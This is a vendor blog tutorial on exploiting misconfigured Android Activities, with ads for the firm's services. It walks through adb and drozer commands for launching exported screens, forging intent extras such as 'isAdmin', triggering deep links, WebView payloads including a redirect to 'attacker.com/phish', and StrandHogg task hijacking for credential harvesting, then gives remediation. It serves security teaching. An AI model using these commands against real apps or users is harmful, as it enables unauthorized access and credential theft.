DATE
March 27, 2026
Android applications are built on four core components: Activities, Services, Broadcast Receivers, and Content Providers. Of these, Activities are the most visible and, when misconfigured, the most exploitable. Understanding how to identify and exploit vulnerable Activities is a foundational skill in Android penetration testing.
This guide walks through the methodology, tools, and commands used to exploit Android Activities, from reconnaissance to exploitation. Whether you are a security researcher, a bug bounty hunter, or someone evaluating your own application, this is the resource you need.
If you are looking for professional help securing your Android applications before attackers find the weaknesses first, Redfox Cybersecurity offers dedicated mobile application pentesting services built for exactly this kind of assessment.
An Activity in Android represents a single screen with a user interface. When an app launches a login screen, a dashboard, or a settings panel, each of those is an Activity. Developers define these in the AndroidManifest.xml file, which acts as the blueprint of the application.
The critical security concern arises when Activities are exported, either explicitly or by accident. An exported Activity can be launched by any other application or external component on the device, bypassing authentication flows, access controls, and user session checks.
Every Activity must be declared in AndroidManifest.xml. The exported attribute determines whether outside apps can invoke it. When android:exported="true" is set, or when an intent-filter is declared (which implicitly exports the Activity on older API levels), that Activity becomes a target.
A vulnerable declaration looks like this:
<activity android:name=".AdminPanelActivity" android:exported="true" />
That single line, if attached to a sensitive screen, can open a significant vulnerability.
Before exploitation, your lab needs to be ready. Here is the standard setup used in Android activity exploitation.
adb devices
adb connect <device_ip>:5555
Pull the target APK from the device:
adb shell pm list packages | grep <app_name>
adb shell pm path com.target.app
adb pull /data/app/com.target.app-1.apk ./target.apk
The first phase is reconnaissance. You need to identify which Activities are exported and potentially vulnerable.
apktool d target.apk -o target_decompiled
Then inspect the manifest:
cat target_decompiled/AndroidManifest.xml | grep -i "exported"
Look for any android:exported="true" on Activities, especially those with names suggesting administrative, settings, or payment functionality.
Drozer is one of the most powerful tools in Android pentesting. Start by launching the Drozer agent on the device and connecting:
drozer console connect
List all Activities in the target package:
run app.activity.info -a com.target.app
This command returns all activities and whether they are exported. Focus on anything marked as exported that is not the main launcher activity.
To see all exported components across the application:
run app.package.attacksurface com.target.app
A typical output might show:
3 activities exported
1 broadcast receivers exported
0 content providers exported
Each exported Activity is a potential entry point. At this stage, engaging a professional team like Redfox Cybersecurity ensures these findings are systematically chained and risk-rated for your organization.
Once you have a list of exported Activities, exploitation can range from simple direct launching to complex intent crafting.
The simplest exploit is launching an exported Activity directly:
adb shell am start -n com.target.app/.AdminPanelActivity
If the application launches the admin panel without requiring authentication, that is a confirmed access control vulnerability. An attacker with physical access to a device, or a malicious app installed on the same device, could silently invoke this.
A common real-world finding is an exported Activity that represents a post-authentication screen. For example:
adb shell am start -n com.target.app/.DashboardActivity
If the dashboard loads without verifying that the user is authenticated, the login screen is effectively bypassed. This is particularly dangerous in banking and healthcare applications.
Some Activities require data passed through Intents. You can supply these through ADB:
adb shell am start -n com.target.app/.UserProfileActivity \
--es "userId" "admin" \
--ez "isAdmin" true
The flags used here:
--es passes a String extra--ez passes a Boolean extra--ei passes an Integer extra--eu passes a URIIf the Activity trusts these intent extras without server-side validation, you can manipulate the user context, elevate privileges, or access unauthorized data.
Drozer provides a cleaner interface for the same attack:
run app.activity.start --component com.target.app com.target.app.AdminPanelActivity
With extras:
run app.activity.start --component com.target.app com.target.app.UserProfileActivity \
--extra string userId admin \
--extra boolean isAdmin true
Beyond exported Activities, implicit intents present another attack surface. When an app sends an implicit intent (one that does not specify a target component), the Android system resolves which app should handle it. A malicious app can register to intercept these intents.
After decompiling with jadx:
jadx -d output_dir target.apk
Search the source for implicit intent usage:
grep -r "new Intent()" output_dir/sources/ | grep -v "explicit"
grep -r "startActivity" output_dir/sources/
Look for intents that use action strings like:
Intent intent = new Intent("com.target.app.OPEN_PAYMENT");
startActivity(intent);
A malicious app can declare the same intent filter in its manifest and intercept this call, performing a UI redirect or phishing attack.
In a controlled test environment, you can build a proof-of-concept app that declares:
<activity android:name=".MaliciousActivity">
<intent-filter>
<action android:name="com.target.app.OPEN_PAYMENT" />
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</activity>
When the target app fires that implicit intent, Android presents the user with a chooser or, in some configurations, directly launches the malicious activity.
Modern Android apps heavily use deep links to allow external navigation into specific Activities. Misconfigured deep links are a goldmine for attackers.
grep -A 10 "intent-filter" target_decompiled/AndroidManifest.xml | grep -i "scheme\|host\|path"
If you find something like:
<data android:scheme="myapp" android:host="open" android:path="/admin" />
You can trigger it directly:
adb shell am start -a android.intent.action.VIEW \
-d "myapp://open/admin" com.target.app
If this opens an administrative section without authentication, it is a high-severity finding. Deep link parameter injection can also lead to open redirects and cross-site scripting within WebView-based Activities.
If an exported Activity loads a WebView, it may be vulnerable to JavaScript injection or URL scheme abuse:
adb shell am start -n com.target.app/.WebViewActivity \
--es "url" "javascript:alert(document.cookie)"
Or redirect the WebView to a phishing page:
adb shell am start -n com.target.app/.WebViewActivity \
--es "url" "https://attacker.com/phish"
WebView vulnerabilities in exported Activities are frequently rated as critical findings, especially when addJavascriptInterface is exposed, which can lead to remote code execution.
Task hijacking, also known as the StrandHogg vulnerability class, allows a malicious app to position itself on top of a legitimate app's Activity stack. The user thinks they are interacting with the real app, but they are actually inside the attacker's UI.
This is achieved by abusing the taskAffinity and allowTaskReparenting attributes:
<activity
android:name=".MaliciousActivity"
android:taskAffinity="com.target.app"
android:allowTaskReparenting="true">
When the target app is brought to the foreground, the malicious Activity sits on top. This attack is particularly effective for credential harvesting.
After identifying vulnerable Activities, a proper pentest report documents each finding with severity, reproduction steps, and remediation advice. Common fixes include:
Setting android:exported="false" for Activities that do not need external access:
<activity android:name=".AdminPanelActivity" android:exported="false" />
Adding permission requirements to exported Activities:
<activity android:name=".AdminPanelActivity"
android:exported="true"
android:permission="com.target.app.ADMIN_PERMISSION" />
Validating authentication state inside every Activity's onCreate method, never relying solely on the navigation flow to enforce access control.
If your development or security team needs a thorough assessment of your Android application, Redfox Cybersecurity's pentesting services cover the full OWASP Mobile Top 10 and go beyond to identify logic-level vulnerabilities that automated scanners miss.
Exploiting Android Activities is not just a theoretical exercise. These vulnerabilities appear regularly in production applications, from consumer finance apps to enterprise MDM solutions. The attack surface is broad: exported activities, implicit intents, deep links, and task hijacking each represent a distinct vector that requires both automated tooling and manual analysis to uncover.
The commands and techniques covered in this guide are standard practice in professional Android security assessments. Mastering them makes you a more effective security researcher and gives your team the lens needed to identify weaknesses before they reach your users.
Security is not a feature to bolt on after launch. It is a discipline that runs through every line of code, every manifest declaration, and every intent that crosses an application boundary.
Ready to have your Android application assessed by experts who know exactly where to look? Get in touch with Redfox Cybersecurity and put your mobile security posture to the test.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.jpg)
.avif)
.jpg)
.jpg)